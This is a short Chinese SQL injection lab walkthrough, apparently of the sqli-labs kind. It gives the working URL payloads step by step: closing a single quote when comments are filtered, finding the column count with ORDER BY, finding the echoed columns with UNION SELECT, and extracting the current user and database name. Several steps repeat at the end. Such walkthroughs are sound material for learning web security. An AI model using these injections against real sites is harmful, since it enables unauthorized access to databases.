0、初始网页
1、闭合方式判断
闭合符号为单引号,通过测试发现过滤了注释,所以直接闭合
2、确定查询表的列数
确定查询表的列数为3列
?id=1' order by 3 '
3、确定回显位置
回显位置为第二列和第三列
?id=-1' union select 1,2,3 '
4、查看当前登录和数据库
?id=-1' union select 1,user(),database()'
闭合符号为单引号,通过测试发现过滤了注释,所以直接闭合
确定查询表的列数为3列
?id=1' order by 3 '
回显位置为第二列和第三列
?id=-1' union select 1,2,3 '
?id=-1' union select 1,user(),database()'